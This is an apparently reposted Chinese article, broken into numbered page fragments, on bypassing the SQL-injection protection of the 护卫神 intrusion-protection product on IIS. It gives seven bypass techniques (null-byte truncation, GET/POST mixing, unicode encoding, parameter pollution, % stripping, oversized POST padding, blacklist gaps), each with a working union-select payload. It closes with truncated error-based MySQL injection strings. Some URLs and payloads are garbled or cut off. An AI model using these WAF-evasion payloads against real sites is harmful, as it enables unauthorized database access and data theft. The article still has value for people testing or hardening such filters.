bypass 护卫神sql注入防御多姿势 作者bypass_W

1、Bypass神SQL注入防御（多姿势）作者：Bypass原文链接：/s? biz=MzA3NzE2MjgwMg=&mid=2448903734&idx=1&sn=93c15da3255fb37ddaba7d2e4910f032&chksm=8b55de6bbc22577d984030af27fa8fba9b0eb9f15a6e65ee11e70b2a8d1a1baf406009e2050b&scene=21#wechat_redirect 收集整理：/test/index.php本文由 干货0x00 前 言神一直

2、专注服务器安全领域， 其中有一款产品，神入侵防护系统 ，提供了一些网站安全防护的功能，在IIS加固模块中有一个SQL防注入功能。这边主要分享一下几种思路，Bypass0x01 环境搭建神SQL注入防御。 神官网： 软件版本：神入侵防护系统 V3.8.1 最新版本下载地址：/hws.zip测试环境：IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL10x02 WAF测试神SQL防注入的规则几年了基本都没有什么变化，先来一张拦截测试图： 2姿势一：%00截断%00截断是上传漏洞中常用的一个非

3、常经典的姿势，在SQL注入中，也可以用来Bypass。 在WAF层，接收参数id后，遇到%00截断，只获取到 id=1，无法获取到后面的有害参数输入； 在ASPX+MSSQL中，支持%00来代替空白字符，构造的SQL语句得以成功执行，获取数据。 32/sql.aspx?id=1%00and 1=2 union select 1,2,column_name from information_schema.columns在PHP+Mysql中，可以用 /*%00*/ ，同样可以进行Bypass。 32/sql.php?id

4、=1/*%00*/union select 1,schema_name,3 from information_schema.schemata姿势二： GET+POST当同时提交GET、POST请求时，进入POST逻辑，而忽略了GET请求的有害参数输入,可轻易Bypass。 在IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL 均适用。 3姿势三： unicode编码IIS服务器支持对于unicode的解析，对关键词进行unicode编码绕过。 32/sql.aspx?id=1 and 1=2 union s%u0045lect 1,2,col

5、umn_name from information_schema.columns姿势四： ASPX+HPP在ASPX中，有一个比较特殊的HPP特性，当GET/POST/COOKIE同时提交的参数id，服务端接收参数id的顺序GET,POST,COOKIE，中间通过逗号链接 。 432/sql.aspx?id=1 and 1=2 union select 1,column_name,3 from information_schema.columns POST：aaaUNION、SELECT、两个关键字拆分放在GET/POST的位置，通过ASPX的这个特性连起

6、来，姿势利用有点局限，分享一下Bypass思路。 32/sql.aspx?id=1 and 1=2 union/*POST：id=*/select 1,column_name,3 from information_schema.columns姿势五： ASP %特性在IIS+ASP中，当我们输入un%ion，解析的时候会去掉%号，服务端接收的参数是union。 32/sql.asp?id=1 and 1=2 un%ion select 1,2,column_name from information_schema.co

7、lumns姿势六：缓冲区溢出在PHP+Mysql中，使用POST 大包溢出的思路可成功Bypass。 编写一个简单的Python脚本，当A的个数填充到49099时，可成功Bypass。 532/sql.phpPOST:id=1 and (select 1)=(Select 0xA*49099) union select 1,schema_name,3 from information_schema.SCHEMATA姿势七：黑绕过护士神SQL防注入，采用的是黑过滤，关键字并不全，比如只过滤union select，select from却放过了，那么这里就存

8、在很多种绕过的形式。 基本上报错注入、盲注、延迟注入都可以很轻易Bypass，这时候直接利用SQLMAP，指定注入方式来获取数据。 60x03 END总结了几种IIS下SQL注入 Bypass的思路，在实战中也很常见。欢迎分享本文，转载请保留出处。 听说公众号赞赏功能升级了，我也来试试。 喜欢这篇文章的人也喜欢 Bypass 360主机卫士SQL注入防御（多姿势）7?id=1 or (select 1 from (select count(),concat(concat(0x5e5e21,version,0x215e5e),floor(rand(0)2)x from information_schema.tables group by x)a)?id=1 and 1=(updatexml(1,concat(0x3a,(select user(),1)?id=1 and extractvalue(1, concat(0x5c, (select VERSION() from informatio